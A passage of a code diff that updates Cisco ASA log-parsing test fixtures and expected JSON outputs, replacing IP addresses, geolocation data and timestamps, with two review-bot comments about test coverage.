outside:195.74.114.34/23", + "ingested": "2021-12-09T13:33:30.615895700Z", + "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", "action": "firewall-rule", 
@@ -4905,25 +4854,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4956,7 +4905,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -4965,8 +4914,8 @@ }, "event": { "severity": 5, - "ingested": "2021-10-11T11:44:17.555480800Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally", + "ingested": "2021-12-09T13:33:30.615901200Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", "action": "bypass", 
@@ -4998,25 +4947,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.138", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.138" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5049,7 +4998,7 @@ "dev01" ], "ip": [ - "91.240.17.138", + "81.2.69.144", "192.168.2.2" ] }, @@ -5059,8 +5008,8 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-10-11T11:44:17.555488500Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514", + "ingested": "2021-12-09T13:33:30.615907100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" }, 
@@ -5083,25 +5032,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5129,7 +5078,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5139,8 +5088,8 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-10-11T11:44:17.555492700Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412", + "ingested": "2021-12-09T13:33:30.615911800Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", "action": "firewall-rule", 
@@ -5171,25 +5120,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5222,7 +5171,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5232,8 +5181,8 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-10-11T11:44:17.555496400Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", + "ingested": "2021-12-09T13:33:30.615916600Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", "action": "firewall-rule", 
@@ -5262,24 +5211,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5307,7 +5256,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5317,8 +5266,8 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-10-11T11:44:17.555502Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been created.", + "ingested": "2021-12-09T13:33:30.615926700Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" }, @@ -5340,24 +5289,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" 
@@ -5385,7 +5334,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5394,8 +5343,8 @@ }, "event": { "severity": 6, - "ingested": "2021-10-11T11:44:17.555507600Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 91.240.17.178 and 192.168.2.2 (user= admin) has been deleted.", + "ingested": "2021-12-09T13:33:30.616188100Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", "action": "deleted", @@ -5429,25 +5378,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5470,7 +5419,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5480,8 +5429,8 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-10-11T11:44:17.555513800Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", + "ingested": "2021-12-09T13:33:30.616193300Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", "action": "connection-started", 
@@ -5512,25 +5461,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5553,7 +5502,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5563,8 +5512,8 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-10-11T11:44:17.555518Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:91.240.17.178:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", + "ingested": "2021-12-09T13:33:30.616198400Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", "action": "error", @@ -5587,17 +5536,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5617,7 +5557,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { 
@@ -5626,8 +5566,8 @@ "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-10-11T11:44:17.555524Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.128.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", + "ingested": "2021-12-09T13:33:30.616203400Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", "action": "firewall-rule", @@ -5650,17 +5590,8 @@ "level": "notification" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.64.157.61", - "ip": "192.64.157.61" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" @@ -5680,7 +5611,7 @@ "dev01" ], "ip": [ - "192.64.157.61" + "192.168.157.61" ] }, "host": { @@ -5689,8 +5620,8 @@ "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-10-11T11:44:17.555529500Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.64.157.61, Duplicate first packet detected. Ignoring packet.", + "ingested": "2021-12-09T13:33:30.616208500Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", "action": "firewall-rule", @@ -5710,17 +5641,8 @@ "level": "informational" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "192.128.1.1", - "ip": "192.128.1.1" + "address": "192.168.1.1", + "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" @@ -5740,7 +5662,7 @@ "dev01" ], "ip": [ - "192.128.1.1" + "192.168.1.1" ] }, "host": { 
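Review bot: `Group = 100.60.140.10` is left in the rewritten `event.original` of `@@ -5626` although the `IP =` value beside it was changed to `192.168.1.1`; the same group address survives in `@@ -5749`, `@@ -5881` and `@@ -5946` on the following lines. 100.60.140.10 is not in a reserved range (the shared-address block starts at 100.64.0.0), so if the commit's rule is to keep only reserved or test-database addresses in fixtures it was missed. Whether the pipeline copies the group value into an IP-typed field is not visible here; if it only lands in a user or group name field the omission is harmless but still inconsistent with the rest of the change.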
@@ -5749,8 +5671,8 @@
 "event": {
 "severity": 6,
 "reason": "All IPSec SA proposals found unacceptable!",
- "ingested": "2021-10-11T11:44:17.555533700Z",
- "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+ "ingested": "2021-12-09T13:33:30.616213100Z",
+ "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!",
 "code": "713905",
 "kind": "event",
 "action": "error",
@@ -5792,7 +5714,7 @@
 "event": {
 "severity": 6,
 "reason": "All IPSec SA proposals found unacceptable!",
- "ingested": "2021-10-11T11:44:17.555538Z",
+ "ingested": "2021-12-09T13:33:30.616217500Z",
 "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!",
 "code": "713904",
 "kind": "event",
@@ -5837,8 +5759,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-11T11:44:17.555541600Z",
- "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+ "ingested": "2021-12-09T13:33:30.616222200Z",
+ "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!",
 "code": "713903",
 "kind": "event",
 "action": "firewall-rule",
@@ -5881,7 +5803,7 @@
 "event": {
 "severity": 6,
 "reason": "All IPSec SA proposals found unacceptable!",
- "ingested": "2021-10-11T11:44:17.555546900Z",
+ "ingested": "2021-12-09T13:33:30.616226700Z",
 "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!",
 "code": "713902",
 "kind": "event",
@@ -5907,17 +5829,8 @@
 "level": "informational"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "192.128.1.1",
- "ip": "192.128.1.1"
+ "address": "192.168.1.1",
+ "ip": "192.168.1.1"
 },
 "tags": [
 "preserve_original_event"
@@ -5937,7 +5850,7 @@
 "dev01"
 ],
 "ip": [
- "192.128.1.1"
+ "192.168.1.1"
 ]
 },
 "host": {
@@ -5946,8 +5859,8 @@
 "event": {
 "severity": 6,
 "reason": "All IPSec SA proposals found unacceptable!",
- "ingested": "2021-10-11T11:44:17.555552500Z",
- "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.128.1.1, All IPSec SA proposals found unacceptable!",
+ "ingested": "2021-12-09T13:33:30.616230700Z",
+ "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!",
 "code": "713901",
 "kind": "event",
 "action": "error",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log
index 80efe8a5553..a3745b40968 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log
@@ -8,4 +8,4 @@ Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.2
 Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]
 Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\username) -> inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]
 Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -> inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
-Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
+Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -> outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
index e062c89adee..bf923419738 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json
@@ -57,7 +57,7 @@
 "event": {
 "severity": 6,
 "duration": 0,
- "ingested": "2021-10-06T20:54:58.682040900Z",
+ "ingested": "2021-12-09T13:33:40.267545800Z",
 "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)",
 "code": "302016",
 "kind": "event",
@@ -134,7 +134,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:54:58.682051600Z",
+ "ingested": "2021-12-09T13:33:40.267555200Z",
 "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -203,7 +203,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:54:58.682058800Z",
+ "ingested": "2021-12-09T13:33:40.267561100Z",
 "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -279,7 +279,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:54:58.682065600Z",
+ "ingested": "2021-12-09T13:33:40.267566800Z",
 "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -340,7 +340,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-10-06T20:54:58.682072300Z",
+ "ingested": "2021-12-09T13:33:40.267572500Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123",
 "code": "106017",
 "kind": "event",
@@ -401,7 +401,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-10-06T20:54:58.682079100Z",
+ "ingested": "2021-12-09T13:33:40.267578400Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1",
 "code": "313008",
 "kind": "event",
@@ -471,7 +471,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-10-06T20:54:58.682085900Z",
+ "ingested": "2021-12-09T13:33:40.267584100Z",
 "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8",
 "code": "313009",
 "kind": "event",
@@ -545,7 +545,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:54:58.682092600Z",
+ "ingested": "2021-12-09T13:33:40.267589800Z",
 "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]",
 "code": "106100",
 "kind": "event",
@@ -615,7 +615,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-10-06T20:54:58.682099300Z",
+ "ingested": "2021-12-09T13:33:40.267609700Z",
 "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]",
 "code": "106100",
 "kind": "event",
@@ -688,7 +688,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-10-06T20:54:58.682106Z",
+ "ingested": "2021-12-09T13:33:40.267615100Z",
 "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]",
 "code": "106102",
 "kind": "event",
@@ -720,19 +720,26 @@
 },
 "destination": {
 "geo": {
- "continent_name": "Asia",
- "region_iso_code": "CN-GD",
- "country_name": "China",
- "region_name": "Guangdong",
+ "continent_name": "Europe",
+ "region_iso_code": "GB-OXF",
+ "city_name": "Abingdon",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "region_name": "Oxfordshire",
 "location": {
- "lon": 113.25,
- "lat": 23.1167
- },
- "country_iso_code": "CN"
+ "lon": -1.3614,
+ "lat": 51.7095
+ }
+ },
+ "as": {
+ "number": 20712,
+ "organization": {
+ "name": "Andrews \u0026 Arnold Ltd"
+ }
 },
- "address": "1.2.33.40",
+ "address": "81.2.69.144",
 "port": 8080,
- "ip": "1.2.33.40"
+ "ip": "81.2.69.144"
 },
 "source": {
 "port": 64321,
@@ -771,13 +778,13 @@
 ],
 "ip": [
 "10.1.2.3",
- "1.2.33.40"
+ "81.2.69.144"
 ]
 },
 "event": {
 "severity": 1,
- "ingested": "2021-10-06T20:54:58.682112600Z",
- "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/1.2.33.40(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]",
+ "ingested": "2021-12-09T13:33:40.267620400Z",
+ "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]",
 "code": "106103",
 "kind": "event",
 "action": "firewall-rule",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log
index 8e53e5f2d89..f73d90c2c38 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log
@@ -1,5 +1,5 @@
-Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 234.56.12.87, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested
-Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 234.28.45.42, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout
+Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested
+Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout
 Oct 20 2019 15:42:54: %ASA-4-722037: Group User IP <83.212.241.149> SVC closing connection: DPD failure.
 Aug 6 2020 11:01:37: %ASA-4-722037: Group User IP <234.63.56.32> SVC closing connection: Transport closing.
-Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <234.24.156.94> IPv4 Address <234.56.47.98> IPv6 address <::> assigned to session
+Aug 6 2020 11:01:38: %ASA-4-722051: Group User IP <67.43.156.12> IPv4 Address <67.43.156.12> IPv6 address <::> assigned to session
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
index 9986bf8056b..d976934cd30 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
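Review bot: The rewritten 722051 line gives the same value, `67.43.156.12`, to both the `IP <...>` and the `IPv4 Address <...>` fields, and the two 113019 sessions now share one address as well, which removes the only thing that let the expected output prove the pipeline reads each value from the correct position. After this change a parser regression that swapped the session IP and the assigned address (the `ip` and `assigned_ip` values in the following expected-JSON hunks) would still pass, and the two 113019 events can no longer be told apart by `related.ip`. Keeping the assigned address distinct from the session address, for example by using a second address from the same supported subset such as `81.2.69.144` that this change already uses in the other fixtures, preserves the positional check; the expected JSON would then need the matching value in the `assigned_ip` hunk. This is a test-coverage point rather than a correctness bug in the pipeline, as far as the hunk shows.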
@@ -6,8 +6,8 @@
 },
 "destination": {
 "bytes": 0,
- "address": "234.56.12.87",
- "ip": "234.56.12.87"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "source": {
 "user": {
@@ -35,15 +35,15 @@
 "Ringo"
 ],
 "ip": [
- "234.56.12.87"
+ "67.43.156.12"
 ]
 },
 "event": {
 "severity": 4,
 "duration": 112000000000,
 "reason": "User Requested",
- "ingested": "2021-10-11T11:16:23.841932100Z",
- "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 234.56.12.87, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested",
+ "ingested": "2021-12-09T13:33:41.556907800Z",
+ "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested",
 "code": "113019",
 "kind": "event",
 "start": "2020-06-08T12:58:05.000Z",
@@ -68,8 +68,8 @@
 },
 "destination": {
 "bytes": 43252324,
- "address": "234.28.45.42",
- "ip": "234.28.45.42"
+ "address": "67.43.156.12",
+ "ip": "67.43.156.12"
 },
 "source": {
 "user": {
@@ -97,15 +97,15 @@
 "John"
 ],
 "ip": [
- "234.28.45.42"
+ "67.43.156.12"
 ]
 },
 "event": {
 "severity": 4,
 "duration": 8854000000000,
 "reason": "Idle Timeout",
- "ingested": "2021-10-11T11:16:23.841946100Z",
